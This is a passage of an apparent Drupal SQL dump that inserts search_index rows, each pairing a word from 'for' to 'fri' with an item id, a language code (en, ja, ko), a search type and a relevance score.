('for', 5, 'en', 'node_search', 29),
('for', 5, 'ja', 'help_search', 2),
('for', 5, 'ko', 'help_search', 2),
('for', 5, 'ko', 'node_search', 29),
('for', 6, 'en', 'help_search', 17.2169),
('for', 6, 'ja', 'help_search', 17.2169),
('for', 6, 'ko', 'help_search', 17.2169),
('for', 7, 'en', 'help_search', 18.4947),
('for', 7, 'en', 'node_search', 33),
('for', 7, 'ja', 'help_search', 18.4947),
('for', 7, 'ko', 'help_search', 18.4947),
('for', 7, 'ko', 'node_search', 33),
('for', 8, 'en', 'help_search', 3),
('for', 8, 'ja', 'help_search', 3),
('for', 8, 'ko', 'help_search', 3),
('for', 9, 'en', 'help_search', 7),
('for', 9, 'ja', 'help_search', 7),
('for', 9, 'ko', 'help_search', 7),
('for', 10, 'en', 'help_search', 12),
('for', 10, 'ja', 'help_search', 12),
('for', 10, 'ko', 'help_search', 12),
('for', 11, 'en', 'help_search', 7.76413),
('for', 11, 'ja', 'help_search', 7.76413),
('for', 11, 'ko', 'help_search', 7.76413),
('for', 12, 'en', 'help_search', 1),
('for', 12, 'ja', 'help_search', 1),
('for', 12, 'ko', 'help_search', 1),
('for', 13, 'en', 'help_search', 1),
('for', 13, 'ja', 'help_search', 1),
('for', 13, 'ko', 'help_search', 1),
('for', 14, 'en', 'help_search', 1),
('for', 14, 'ja', 'help_search', 1),
('for', 14, 'ko', 'help_search', 1),
('for', 15, 'en', 'help_search', 1),
('for', 15, 'ja', 'help_search', 1),
('for', 15, 'ko', 'help_search', 1),
('for', 16, 'en', 'help_search', 5),
('for', 16, 'ja', 'help_search', 5),
('for', 16, 'ko', 'help_search', 5),
('for', 17, 'en', 'help_search', 2),
('for', 17, 'ja', 'help_search', 2),
('for', 17, 'ko', 'help_search', 2),
('for', 18, 'en', 'help_search', 3),
('for', 18, 'ja', 'help_search', 3),
('for', 18, 'ko', 'help_search', 3),
('for', 19, 'en', 'help_search', 1),
('for', 19, 'en', 'node_search', 28),
('for', 19, 'ja', 'help_search', 1),
('for', 19, 'ko', 'help_search', 1),
('for', 19, 'ko', 'node_search', 28),
('for', 20, 'en', 'help_search', 1),
('for', 20, 'ja', 'help_search', 1),
('for', 20, 'ko', 'help_search', 1),
('for', 21, 'en', 'help_search', 2),
('for', 21, 'ja', 'help_search', 2),
('for', 21, 'ko', 'help_search', 2),
('for', 22, 'en', 'help_search', 5.98902),
('for', 22, 'ja', 'help_search', 5.98902),
('for', 22, 'ko', 'help_search', 5.98902),
('for', 23, 'en', 'help_search', 2),
('for', 23, 'en', 'node_search', 5.54689),
('for', 23, 'ja', 'help_search', 2),
('for', 23, 'ko', 'help_search', 2),
('for', 24, 'en', 'help_search', 10),
('for', 24, 'en', 'node_search', 6.14891),
('for', 24, 'ja', 'help_search', 10),
('for', 24, 'ko', 'help_search', 10),
('for', 25, 'en', 'help_search', 33),
('for', 25, 'ja', 'help_search', 33),
('for', 26, 'en', 'help_search', 33),
('for', 26, 'en', 'node_search', 1),
('for', 26, 'ja', 'help_search', 33),
('for', 26, 'ja', 'node_search', 1),
('for', 26, 'ko', 'help_search', 33),
('for', 27, 'en', 'help_search', 9),
('for', 27, 'en', 'node_search', 5.43714),
('for', 27, 'ja', 'help_search', 9),
('for', 27, 'ko', 'help_search', 9),
('for', 28, 'en', 'help_search', 5.52904),
('for', 28, 'en', 'node_search', 1),
('for', 28, 'ja', 'help_search', 5.52904),
('for', 28, 'ko', 'help_search', 5.52904),
('for', 29, 'en', 'help_search', 6.89158),
('for', 29, 'ja', 'help_search', 6.89158),
('for', 29, 'ko', 'help_search', 6.89158),
('for', 30, 'en', 'help_search', 9.15176),
('for', 30, 'en', 'node_search', 2),
('for', 30, 'ja', 'help_search', 9.15176),
('for', 30, 'ko', 'help_search', 9.15176),
('for', 31, 'en', 'node_search', 30.9097),
('for', 31, 'ja', 'help_search', 28.7994),
('for', 32, 'en', 'help_search', 20.9931),
('for', 32, 'ja', 'help_search', 20.9931),
('for', 32, 'ko', 'help_search', 20.9931),
('for', 33, 'en', 'help_search', 1),
('for', 33, 'ja', 'help_search', 1),
('for', 33, 'ko', 'help_search', 1),
('for', 34, 'en', 'help_search', 2),
('for', 34, 'ja', 'help_search', 2),
('for', 34, 'ko', 'help_search', 2),
('for', 35, 'en', 'help_search', 6.94585),
('for', 35, 'ja', 'help_search', 6.94585),
('for', 35, 'ko', 'help_search', 6.94585),
('for', 36, 'en', 'help_search', 3),
('for', 36, 'ja', 'help_search', 3),
('for', 36, 'ko', 'help_search', 3),
('for', 37, 'en', 'help_search', 31.5331),
('for', 37, 'ja', 'help_search', 31.5331),
('for', 37, 'ko', 'help_search', 31.5331),
('for', 38, 'en', 'help_search', 2),
('for', 38, 'ja', 'help_search', 2),
('for', 38, 'ko', 'help_search', 2),
('for', 39, 'en', 'help_search', 5),
('for', 39, 'ja', 'help_search', 5),
('for', 39, 'ko', 'help_search', 5),
('for', 40, 'en', 'help_search', 1),
('for', 40, 'ja', 'help_search', 1),
('for', 40, 'ko', 'help_search', 1),
('for', 41, 'en', 'help_search', 1),
('for', 41, 'ja', 'help_search', 1),
('for', 41, 'ko', 'help_search', 1),
('for', 42, 'en', 'help_search', 3),
('for', 42, 'ja', 'help_search', 3),
('for', 42, 'ko', 'help_search', 3),
('for', 43, 'en', 'help_search', 5.78798),
('for', 43, 'ja', 'help_search', 5.78798),
('for', 43, 'ko', 'help_search', 5.78798),
('for', 44, 'en', 'help_search', 28),
('for', 44, 'ja', 'help_search', 28),
('for', 44, 'ko', 'help_search', 28),
('for', 45, 'en', 'help_search', 4),
('for', 45, 'ja', 'help_search', 4),
('for', 45, 'ko', 'help_search', 4),
('for', 46, 'en', 'help_search', 20.9496),
('for', 46, 'ja', 'help_search', 20.9496),
('for', 46, 'ko', 'help_search', 20.9496),
('for', 47, 'en', 'help_search', 22),
('for', 47, 'ja', 'help_search', 22),
('for', 47, 'ko', 'help_search', 22),
('for', 48, 'en', 'help_search', 4),
('for', 48, 'ja', 'help_search', 4),
('for', 48, 'ko', 'help_search', 4),
('for', 49, 'en', 'help_search', 4),
('for', 49, 'ja', 'help_search', 4),
('for', 49, 'ko', 'help_search', 4),
('for', 50, 'en', 'help_search', 8),
('for', 50, 'ja', 'help_search', 8),
('for', 50, 'ko', 'help_search', 8),
('for', 51, 'en', 'help_search', 2),
('for', 51, 'ja', 'help_search', 2),
('for', 51, 'ko', 'help_search', 2),
('for', 52, 'en', 'help_search', 2),
('for', 52, 'ja', 'help_search', 2),
('for', 52, 'ko', 'help_search', 2),
('for', 53, 'en', 'help_search', 1),
('for', 53, 'ja', 'help_search', 1),
('for', 53, 'ko', 'help_search', 1),
('for', 54, 'en', 'help_search', 8),
('for', 54, 'ja', 'help_search', 8),
('for', 54, 'ko', 'help_search', 8),
('for', 55, 'en', 'help_search', 27),
('for', 55, 'ja', 'help_search', 27),
('for', 55, 'ko', 'help_search', 27),
('for', 56, 'en', 'help_search', 1),
('for', 56, 'ja', 'help_search', 1),
('for', 56, 'ko', 'help_search', 1),
('for', 57, 'en', 'help_search', 3),
('for', 57, 'ja', 'help_search', 3),
('for', 57, 'ko', 'help_search', 3),
('for', 58, 'en', 'help_search', 1),
('for', 58, 'ja', 'help_search', 1),
('for', 58, 'ko', 'help_search', 1),
('for', 59, 'en', 'help_search', 5),
('for', 59, 'ja', 'help_search', 5),
('for', 59, 'ko', 'help_search', 5),
('for', 60, 'en', 'help_search', 4),
('for', 60, 'ja', 'help_search', 4),
('for', 60, 'ko', 'help_search', 4),
('for', 61, 'en', 'help_search', 5.99731),
('for', 61, 'ja', 'help_search', 5.99731),
('for', 61, 'ko', 'help_search', 5.99731),
('for', 62, 'en', 'help_search', 8),
('for', 62, 'en', 'node_search', 1),
('for', 62, 'ja', 'help_search', 8),
('for', 62, 'ko', 'help_search', 8),
('for', 63, 'en', 'help_search', 32),
('for', 63, 'ja', 'help_search', 32),
('for', 63, 'ko', 'help_search', 32),
('for', 64, 'en', 'help_search', 4),
('for', 64, 'ja', 'help_search', 4),
('for', 64, 'ko', 'help_search', 4),
('for', 65, 'en', 'help_search', 35),
('for', 65, 'ja', 'help_search', 35),
('for', 65, 'ko', 'help_search', 35),
('for', 66, 'en', 'help_search', 3),
('for', 66, 'en', 'node_search', 35.9146),
('for', 66, 'ja', 'help_search', 3),
('for', 67, 'en', 'help_search', 5.6446),
('for', 67, 'ja', 'help_search', 5.6446),
('for', 67, 'ko', 'help_search', 5.6446),
('for', 68, 'en', 'help_search', 24.6358),
('for', 68, 'en', 'node_search', 5),
('for', 68, 'ja', 'help_search', 24.6358),
('for', 68, 'ja', 'node_search', 1),
('for', 68, 'ko', 'help_search', 24.6358),
('for', 69, 'en', 'help_search', 1),
('for', 69, 'en', 'node_search', 1),
('for', 69, 'ja', 'help_search', 1),
('for', 69, 'ko', 'help_search', 1),
('for', 70, 'en', 'node_search', 2),
('for', 71, 'en', 'help_search', 4),
('for', 71, 'en', 'node_search', 2),
('for', 71, 'ja', 'help_search', 4),
('for', 71, 'ko', 'help_search', 4),
('for', 72, 'en', 'help_search', 7.83681),
('for', 72, 'en', 'node_search', 2),
('for', 72, 'ja', 'help_search', 7.83681),
('for', 72, 'ko', 'help_search', 7.83681),
('for', 73, 'en', 'help_search', 1),
('for', 73, 'en', 'node_search', 2),
('for', 73, 'ja', 'help_search', 1),
('for', 73, 'ko', 'help_search', 1),
('for', 74, 'en', 'help_search', 2),
('for', 74, 'en', 'node_search', 1),
('for', 74, 'ja', 'help_search', 2),
('for', 74, 'ko', 'help_search', 2),
('for', 75, 'en', 'help_search', 3),
('for', 75, 'en', 'node_search', 1),
('for', 75, 'ja', 'help_search', 3),
('for', 75, 'ko', 'help_search', 3),
('for', 76, 'en', 'help_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('for', 76, 'en', 'node_search', 9),
('for', 76, 'ja', 'help_search', 1),
('for', 76, 'ja', 'node_search', 1),
('for', 76, 'ko', 'help_search', 1),
('for', 77, 'en', 'help_search', 6),
('for', 77, 'ja', 'help_search', 6),
('for', 77, 'ko', 'help_search', 6),
('for', 78, 'en', 'help_search', 1),
('for', 78, 'en', 'node_search', 1),
('for', 78, 'ja', 'help_search', 1),
('for', 78, 'ko', 'help_search', 1),
('for', 79, 'en', 'help_search', 7),
('for', 79, 'en', 'node_search', 1),
('for', 79, 'ja', 'help_search', 7),
('for', 79, 'ko', 'help_search', 7),
('for', 80, 'en', 'help_search', 7.79579),
('for', 80, 'en', 'node_search', 1),
('for', 80, 'ja', 'help_search', 7.79579),
('for', 80, 'ja', 'node_search', 0.997306),
('for', 80, 'ko', 'help_search', 7.79579),
('for', 81, 'en', 'help_search', 1),
('for', 81, 'en', 'node_search', 35),
('for', 81, 'ja', 'help_search', 1),
('for', 81, 'ja', 'node_search', 27),
('for', 81, 'ko', 'help_search', 1),
('for', 82, 'en', 'help_search', 2),
('for', 82, 'en', 'node_search', 1),
('for', 82, 'ja', 'help_search', 2),
('for', 82, 'ko', 'help_search', 2),
('for', 83, 'en', 'help_search', 1),
('for', 83, 'en', 'node_search', 30),
('for', 83, 'ja', 'help_search', 1),
('for', 83, 'ja', 'node_search', 28),
('for', 83, 'ko', 'help_search', 1),
('for', 84, 'en', 'help_search', 2),
('for', 84, 'en', 'node_search', 1),
('for', 84, 'ja', 'help_search', 2),
('for', 84, 'ko', 'help_search', 2),
('for', 85, 'en', 'help_search', 28),
('for', 85, 'en', 'node_search', 4),
('for', 85, 'ja', 'help_search', 28),
('for', 85, 'ko', 'help_search', 28),
('for', 86, 'en', 'help_search', 5.98633),
('for', 86, 'en', 'node_search', 29),
('for', 86, 'ja', 'help_search', 5.98633),
('for', 86, 'ja', 'node_search', 28),
('for', 86, 'ko', 'help_search', 5.98633),
('for', 87, 'en', 'node_search', 2),
('for', 88, 'en', 'help_search', 3),
('for', 88, 'en', 'node_search', 29),
('for', 88, 'ja', 'help_search', 3),
('for', 88, 'ja', 'node_search', 28),
('for', 88, 'ko', 'help_search', 3),
('for', 89, 'en', 'help_search', 3),
('for', 89, 'en', 'node_search', 29),
('for', 89, 'ja', 'help_search', 3),
('for', 89, 'ja', 'node_search', 28),
('for', 89, 'ko', 'help_search', 3),
('for', 90, 'en', 'help_search', 1),
('for', 90, 'en', 'node_search', 1),
('for', 90, 'ja', 'help_search', 1),
('for', 90, 'ko', 'help_search', 1),
('for', 91, 'en', 'help_search', 6),
('for', 91, 'en', 'node_search', 29),
('for', 91, 'ja', 'help_search', 6),
('for', 91, 'ja', 'node_search', 28),
('for', 91, 'ko', 'help_search', 6),
('for', 92, 'en', 'help_search', 11),
('for', 92, 'en', 'node_search', 29),
('for', 92, 'ja', 'help_search', 11),
('for', 92, 'ja', 'node_search', 28),
('for', 92, 'ko', 'help_search', 11),
('for', 93, 'en', 'help_search', 5.41199),
('for', 93, 'en', 'node_search', 29),
('for', 93, 'ja', 'help_search', 5.41199),
('for', 93, 'ja', 'node_search', 28),
('for', 93, 'ko', 'help_search', 5.41199),
('for', 94, 'en', 'node_search', 29),
('for', 95, 'en', 'node_search', 29),
('for', 95, 'ja', 'node_search', 27),
('for', 96, 'en', 'node_search', 29),
('for', 96, 'ja', 'node_search', 28),
('for', 97, 'en', 'node_search', 29),
('for', 97, 'ja', 'node_search', 28),
('for', 98, 'en', 'node_search', 29),
('for', 98, 'ja', 'node_search', 27),
('for', 99, 'en', 'node_search', 29),
('for', 99, 'ja', 'node_search', 28),
('for', 100, 'en', 'node_search', 4),
('for', 101, 'en', 'node_search', 28),
('for', 101, 'ja', 'node_search', 27),
('for', 103, 'en', 'node_search', 29),
('for', 103, 'ja', 'node_search', 29),
('for', 104, 'en', 'node_search', 1),
('for', 105, 'en', 'node_search', 29),
('for', 105, 'ja', 'node_search', 28),
('for', 106, 'en', 'node_search', 1),
('for', 107, 'en', 'node_search', 1),
('for', 108, 'en', 'node_search', 29),
('for', 108, 'ja', 'node_search', 28),
('for', 109, 'en', 'node_search', 2),
('for', 110, 'en', 'node_search', 1),
('for', 111, 'en', 'node_search', 3),
('for', 111, 'ja', 'node_search', 1),
('for', 112, 'en', 'node_search', 1),
('for', 113, 'en', 'node_search', 3),
('for', 113, 'ja', 'node_search', 1),
('for', 114, 'en', 'node_search', 1),
('for', 115, 'en', 'node_search', 2),
('for', 117, 'en', 'node_search', 1),
('for', 118, 'en', 'node_search', 1),
('for', 119, 'en', 'node_search', 1),
('for', 120, 'en', 'node_search', 50),
('for', 120, 'ja', 'node_search', 27),
('for', 121, 'en', 'node_search', 1),
('for', 122, 'en', 'node_search', 1),
('for', 123, 'en', 'node_search', 1),
('for', 124, 'en', 'node_search', 2),
('for', 125, 'en', 'node_search', 1),
('for', 127, 'en', 'node_search', 1),
('for', 127, 'ja', 'node_search', 1),
('for', 128, 'en', 'node_search', 28),
('for', 128, 'ja', 'node_search', 28),
('for', 131, 'en', 'node_search', 2),
('for', 132, 'en', 'node_search', 2),
('for', 133, 'en', 'node_search', 2),
('for', 134, 'en', 'node_search', 29),
('for', 134, 'ja', 'node_search', 27),
('for', 135, 'en', 'node_search', 3),
('for', 136, 'en', 'node_search', 3),
('for', 137, 'en', 'node_search', 2),
('for', 138, 'en', 'node_search', 1),
('for', 139, 'en', 'node_search', 2),
('for', 140, 'en', 'node_search', 47),
('for', 140, 'ja', 'node_search', 27),
('for', 141, 'en', 'node_search', 2),
('for', 142, 'en', 'node_search', 3),
('for', 143, 'en', 'node_search', 2),
('for', 144, 'en', 'node_search', 1),
('for', 145, 'en', 'node_search', 47),
('for', 145, 'ja', 'node_search', 27),
('for', 146, 'en', 'node_search', 26),
('for', 146, 'ja', 'node_search', 27),
('for', 147, 'en', 'node_search', 34),
('for', 147, 'ja', 'node_search', 27),
('for', 148, 'en', 'node_search', 28),
('for', 148, 'ja', 'node_search', 27),
('for', 149, 'en', 'node_search', 47),
('for', 150, 'en', 'node_search', 2),
('for', 151, 'en', 'node_search', 47),
('for', 151, 'ja', 'node_search', 27),
('for', 152, 'en', 'node_search', 27),
('for', 152, 'ja', 'node_search', 27),
('for', 153, 'en', 'node_search', 47),
('for', 153, 'ja', 'node_search', 27),
('for', 154, 'en', 'node_search', 30),
('for', 155, 'en', 'node_search', 5),
('for', 156, 'en', 'node_search', 2),
('for', 157, 'en', 'node_search', 2),
('for', 160, 'en', 'node_search', 5),
('for', 161, 'en', 'node_search', 7),
('for', 162, 'en', 'node_search', 2.86366),
('for', 163, 'en', 'node_search', 31.8637),
('for', 164, 'en', 'node_search', 2),
('for', 165, 'en', 'node_search', 29),
('for', 166, 'en', 'node_search', 7),
('for', 167, 'en', 'node_search', 29),
('for', 168, 'en', 'node_search', 2),
('for', 169, 'en', 'node_search', 32),
('for', 170, 'en', 'node_search', 5),
('for', 171, 'en', 'node_search', 5),
('for', 173, 'en', 'node_search', 5),
('for', 174, 'en', 'node_search', 3),
('for', 175, 'en', 'node_search', 2),
('for', 176, 'en', 'node_search', 29),
('for', 177, 'en', 'node_search', 2),
('for', 178, 'en', 'node_search', 2),
('for', 179, 'en', 'node_search', 2),
('for', 180, 'en', 'node_search', 3),
('for', 181, 'en', 'node_search', 1),
('for', 183, 'en', 'node_search', 1),
('for', 184, 'en', 'node_search', 30),
('for', 185, 'en', 'node_search', 4),
('for', 186, 'en', 'node_search', 29),
('for', 187, 'en', 'node_search', 6),
('for', 188, 'en', 'node_search', 29),
('for', 189, 'en', 'node_search', 5),
('for', 190, 'en', 'node_search', 5),
('for', 191, 'en', 'node_search', 5),
('for', 192, 'en', 'node_search', 2),
('for', 193, 'en', 'node_search', 6),
('for', 194, 'en', 'node_search', 6),
('for', 195, 'en', 'node_search', 3),
('for', 196, 'en', 'node_search', 5),
('for', 197, 'en', 'node_search', 5),
('for', 198, 'en', 'node_search', 3),
('for', 199, 'en', 'node_search', 5),
('for', 204, 'en', 'node_search', 4),
('for', 204, 'ja', 'node_search', 4),
('force', 45, 'en', 'help_search', 1),
('force', 45, 'ja', 'help_search', 1),
('force', 45, 'ko', 'help_search', 1),
('forcing', 37, 'en', 'help_search', 1),
('forcing', 37, 'ja', 'help_search', 1),
('forcing', 37, 'ko', 'help_search', 1),
('foreign', 7, 'en', 'node_search', 29),
('foreign', 7, 'ko', 'node_search', 29),
('foreign', 23, 'en', 'node_search', 0.759465),
('foreign', 24, 'en', 'node_search', 2),
('foreign', 28, 'en', 'node_search', 1),
('foreign', 138, 'en', 'node_search', 1),
('form', 5, 'en', 'help_search', 5),
('form', 5, 'ja', 'help_search', 5),
('form', 5, 'ko', 'help_search', 5),
('form', 6, 'en', 'help_search', 1),
('form', 6, 'ja', 'help_search', 1),
('form', 6, 'ko', 'help_search', 1),
('form', 7, 'en', 'help_search', 5.95111),
('form', 7, 'ja', 'help_search', 5.95111),
('form', 7, 'ko', 'help_search', 5.95111),
('form', 8, 'en', 'help_search', 1),
('form', 8, 'ja', 'help_search', 1),
('form', 8, 'ko', 'help_search', 1),
('form', 11, 'en', 'help_search', 1),
('form', 11, 'ja', 'help_search', 1),
('form', 11, 'ko', 'help_search', 1),
('form', 17, 'en', 'help_search', 8),
('form', 17, 'ja', 'help_search', 8),
('form', 17, 'ko', 'help_search', 8),
('form', 18, 'en', 'help_search', 2),
('form', 18, 'ja', 'help_search', 2),
('form', 18, 'ko', 'help_search', 2),
('form', 19, 'en', 'help_search', 34),
('form', 19, 'ja', 'help_search', 34),
('form', 19, 'ko', 'help_search', 34),
('form', 20, 'en', 'help_search', 42),
('form', 20, 'ja', 'help_search', 42),
('form', 20, 'ko', 'help_search', 42),
('form', 21, 'en', 'help_search', 44),
('form', 21, 'ja', 'help_search', 44),
('form', 21, 'ko', 'help_search', 44),
('form', 26, 'en', 'help_search', 35),
('form', 26, 'ja', 'help_search', 35),
('form', 26, 'ko', 'help_search', 35),
('form', 30, 'en', 'help_search', 1),
('form', 30, 'ja', 'help_search', 1),
('form', 30, 'ko', 'help_search', 1),
('form', 39, 'en', 'help_search', 2),
('form', 39, 'ja', 'help_search', 2),
('form', 39, 'ko', 'help_search', 2),
('form', 42, 'en', 'help_search', 4.98493),
('form', 42, 'ja', 'help_search', 4.98493),
('form', 42, 'ko', 'help_search', 4.98493),
('form', 45, 'en', 'help_search', 5),
('form', 45, 'ja', 'help_search', 5),
('form', 45, 'ko', 'help_search', 5),
('form', 59, 'en', 'help_search', 2),
('form', 59, 'ja', 'help_search', 2),
('form', 59, 'ko', 'help_search', 2),
('form', 60, 'en', 'help_search', 1),
('form', 60, 'ja', 'help_search', 1),
('form', 60, 'ko', 'help_search', 1),
('form', 62, 'en', 'help_search', 1),
('form', 62, 'ja', 'help_search', 1),
('form', 62, 'ko', 'help_search', 1),
('form', 63, 'en', 'help_search', 2),
('form', 63, 'ja', 'help_search', 2),
('form', 63, 'ko', 'help_search', 2),
('form', 68, 'en', 'help_search', 8.95339),
('form', 68, 'ja', 'help_search', 8.95339),
('form', 68, 'ko', 'help_search', 8.95339),
('form', 72, 'en', 'help_search', 1),
('form', 72, 'ja', 'help_search', 1),
('form', 72, 'ko', 'help_search', 1),
('form', 79, 'en', 'help_search', 1),
('form', 79, 'ja', 'help_search', 1),
('form', 79, 'ko', 'help_search', 1),
('form', 80, 'en', 'help_search', 2),
('form', 80, 'ja', 'help_search', 2),
('form', 80, 'ko', 'help_search', 2),
('form', 82, 'en', 'help_search', 1),
('form', 82, 'ja', 'help_search', 1),
('form', 82, 'ko', 'help_search', 1),
('form', 87, 'en', 'help_search', 1),
('form', 87, 'ja', 'help_search', 1),
('form', 87, 'ko', 'help_search', 1),
('form', 89, 'en', 'help_search', 32),
('form', 89, 'ja', 'help_search', 32),
('form', 89, 'ko', 'help_search', 32),
('form', 93, 'en', 'help_search', 5.21371),
('form', 93, 'ja', 'help_search', 5.21371),
('form', 93, 'ko', 'help_search', 5.21371),
('formal', 6, 'en', 'help_search', 1),
('formal', 6, 'ja', 'help_search', 1),
('formal', 6, 'ko', 'help_search', 1),
('format', 15, 'en', 'help_search', 1),
('format', 15, 'ja', 'help_search', 1),
('format', 15, 'ko', 'help_search', 1),
('format', 23, 'en', 'help_search', 7.64925),
('format', 23, 'ja', 'help_search', 7.64925),
('format', 23, 'ko', 'help_search', 7.64925),
('format', 25, 'ja', 'help_search', 4),
('format', 28, 'en', 'help_search', 15.6114),
('format', 28, 'ja', 'help_search', 15.6114),
('format', 28, 'ko', 'help_search', 15.6114),
('format', 30, 'en', 'help_search', 0.810915),
('format', 30, 'ja', 'help_search', 0.810915),
('format', 30, 'ko', 'help_search', 0.810915),
('format', 37, 'en', 'help_search', 1),
('format', 37, 'ja', 'help_search', 1),
('format', 37, 'ko', 'help_search', 1),
('format', 44, 'en', 'help_search', 2),
('format', 44, 'ja', 'help_search', 2),
('format', 44, 'ko', 'help_search', 2),
('format', 48, 'en', 'help_search', 1),
('format', 48, 'ja', 'help_search', 1),
('format', 48, 'ko', 'help_search', 1),
('format', 71, 'en', 'help_search', 25),
('format', 71, 'ja', 'help_search', 25),
('format', 71, 'ko', 'help_search', 25),
('format', 89, 'en', 'help_search', 1),
('format', 89, 'ja', 'help_search', 1),
('format', 89, 'ko', 'help_search', 1),
('format', 91, 'en', 'help_search', 15),
('format', 91, 'ja', 'help_search', 15),
('format', 91, 'ko', 'help_search', 15),
('format', 93, 'en', 'help_search', 6.85746),
('format', 93, 'ja', 'help_search', 6.85746),
('format', 93, 'ko', 'help_search', 6.85746),
('formats', 23, 'en', 'help_search', 33.8367),
('formats', 23, 'ja', 'help_search', 33.8367),
('formats', 23, 'ko', 'help_search', 33.8367),
('formats', 28, 'en', 'help_search', 63.3271),
('formats', 28, 'ja', 'help_search', 63.3271),
('formats', 28, 'ko', 'help_search', 63.3271),
('formats', 44, 'en', 'help_search', 2),
('formats', 44, 'ja', 'help_search', 2),
('formats', 44, 'ko', 'help_search', 2),
('formats', 71, 'en', 'help_search', 7),
('formats', 71, 'ja', 'help_search', 7),
('formats', 71, 'ko', 'help_search', 7),
('formats', 93, 'en', 'help_search', 2),
('formats', 93, 'ja', 'help_search', 2),
('formats', 93, 'ko', 'help_search', 2),
('formatted', 23, 'en', 'help_search', 1),
('formatted', 23, 'ja', 'help_search', 1),
('formatted', 23, 'ko', 'help_search', 1),
('formatted', 28, 'en', 'help_search', 5),
('formatted', 28, 'ja', 'help_search', 5),
('formatted', 28, 'ko', 'help_search', 5),
('formatted', 31, 'ja', 'help_search', 8.81776),
('formatted', 93, 'en', 'help_search', 1),
('formatted', 93, 'ja', 'help_search', 1),
('formatted', 93, 'ko', 'help_search', 1),
('formatter', 25, 'en', 'help_search', 3),
('formatter', 25, 'ja', 'help_search', 3),
('formatters', 25, 'en', 'help_search', 5),
('formatters', 25, 'ja', 'help_search', 5),
('formatting', 46, 'en', 'help_search', 1),
('formatting', 46, 'ja', 'help_search', 1),
('formatting', 46, 'ko', 'help_search', 1),
('forms', 17, 'en', 'help_search', 51),
('forms', 17, 'ja', 'help_search', 51),
('forms', 17, 'ko', 'help_search', 51),
('forms', 18, 'en', 'help_search', 34),
('forms', 18, 'ja', 'help_search', 34),
('forms', 18, 'ko', 'help_search', 34),
('forms', 19, 'en', 'help_search', 5),
('forms', 19, 'ja', 'help_search', 5),
('forms', 19, 'ko', 'help_search', 5),
('forms', 20, 'en', 'help_search', 49),
('forms', 20, 'ja', 'help_search', 49),
('forms', 20, 'ko', 'help_search', 49),
('forms', 21, 'en', 'help_search', 4),
('forms', 21, 'ja', 'help_search', 4),
('forms', 21, 'ko', 'help_search', 4),
('forms', 23, 'en', 'help_search', 0.842342),
('forms', 23, 'ja', 'help_search', 0.842342),
('forms', 23, 'ko', 'help_search', 0.842342),
('forms', 30, 'en', 'help_search', 0.695602),
('forms', 30, 'ja', 'help_search', 0.695602),
('forms', 30, 'ko', 'help_search', 0.695602),
('forward', 140, 'en', 'node_search', 1),
('forward', 166, 'en', 'node_search', 1),
('forward', 178, 'en', 'node_search', 2),
('forward', 182, 'en', 'node_search', 1),
('forward', 186, 'en', 'node_search', 1),
('forward', 187, 'en', 'node_search', 2),
('forward', 189, 'en', 'node_search', 1),
('forward', 194, 'en', 'node_search', 1),
('forward', 195, 'en', 'node_search', 2),
('forward', 197, 'en', 'node_search', 2),
('fostering', 135, 'en', 'node_search', 1),
('fosters', 120, 'en', 'node_search', 1),
('found', 46, 'en', 'help_search', 1),
('found', 46, 'ja', 'help_search', 1),
('found', 46, 'ko', 'help_search', 1),
('foundation', 198, 'en', 'node_search', 1),
('founded', 27, 'en', 'node_search', 3.64556),
('four', 31, 'ja', 'help_search', 1),
('four', 62, 'en', 'node_search', 1),
('four', 165, 'en', 'node_search', 29),
('four', 167, 'en', 'node_search', 29),
('framework', 23, 'en', 'help_search', 1),
('framework', 23, 'ja', 'help_search', 1),
('framework', 23, 'ko', 'help_search', 1),
('framework', 44, 'en', 'help_search', 1),
('framework', 44, 'ja', 'help_search', 1),
('framework', 44, 'ko', 'help_search', 1),
('free', 1, 'en', 'node_search', 1),
('free', 80, 'en', 'help_search', 1),
('free', 80, 'ja', 'help_search', 1),
('free', 80, 'ko', 'help_search', 1),
('french', 50, 'en', 'help_search', 1),
('french', 50, 'ja', 'help_search', 1),
('french', 50, 'ko', 'help_search', 1),
('fresh', 122, 'en', 'node_search', 1),
('frexamplecom', 50, 'en', 'help_search', 4),
('frexamplecom', 50, 'ja', 'help_search', 4),
('frexamplecom', 50, 'ko', 'help_search', 4),
('fri', 8, 'en', 'node_search', 1),
('fri', 8, 'ja', 'node_search', 1),
('fri', 8, 'ko', 'node_search', 1),
('fri', 18, 'en', 'node_search', 1),
('fri', 18, 'ja', 'node_search', 1),
('fri', 18, 'ko', 'node_search', 1),
('fri', 28, 'en', 'node_search', 1),
('fri', 28, 'ja', 'node_search', 1),
('fri', 28, 'ko', 'node_search', 1),
('fri', 29, 'en', 'node_search', 1),
('fri', 29, 'ja', 'node_search', 1),
('fri', 29, 'ko', 'node_search', 1),
('fri', 30, 'en', 'node_search', 1),
('fri', 30, 'ja', 'node_search', 1),
('fri', 30, 'ko', 'node_search', 1),
('fri', 31, 'en', 'node_search', 1),
('fri', 62, 'en', 'node_search', 2),
('fri', 62, 'ja', 'node_search', 2),
('fri', 88, 'en', 'node_search', 1),
('fri', 88, 'ja', 'node_search', 1),
('fri', 101, 'en', 'node_search', 1),
('fri', 101, 'ja', 'node_search', 1),
('fri', 118, 'en', 'node_search', 1),
('fri', 118, 'ja', 'node_search', 1),
('fri', 119, 'en', 'node_search', 1),
('fri', 119, 'ja', 'node_search', 1),
('fri', 121, 'en', 'node_search', 1),
('fri', 121, 'ja', 'node_search', 1),
('fri', 143, 'en', 'node_search', 1),
('fri', 143, 'ja', 'node_search', 1),
('fri', 144, 'en', 'node_search', 1),
('fri', 144, 'ja', 'node_search', 1),
('fri', 145, 'en', 'node_search', 2),
('fri', 145, 'ja', 'node_search', 2),
('fri', 146, 'en', 'node_search', 2),
('fri', 146, 'ja', 'node_search', 2),
('fri', 147, 'en', 'node_search', 1),
('fri', 147, 'ja', 'node_search', 1),
('fri', 154, 'en', 'node_search', 1),
('fri', 154, 'ja', 'node_search', 1),
('fri', 155, 'en', 'node_search', 1),
('fri', 155, 'ja', 'node_search', 1),
('fri', 156, 'en', 'node_search', 1),
('fri', 156, 'ja', 'node_search', 1),
('fri', 157, 'en', 'node_search', 1),
('fri', 157, 'ja', 'node_search', 1),
('fri', 160, 'en', 'node_search', 1),
('fri', 160, 'ja', 'node_search', 1),
('fri', 161, 'en', 'node_search', 1),
('fri', 161, 'ja', 'node_search', 1),
('fri', 162, 'en', 'node_search', 1),
('fri', 162, 'ja', 'node_search', 1),
('fri', 163, 'en', 'node_search', 1),
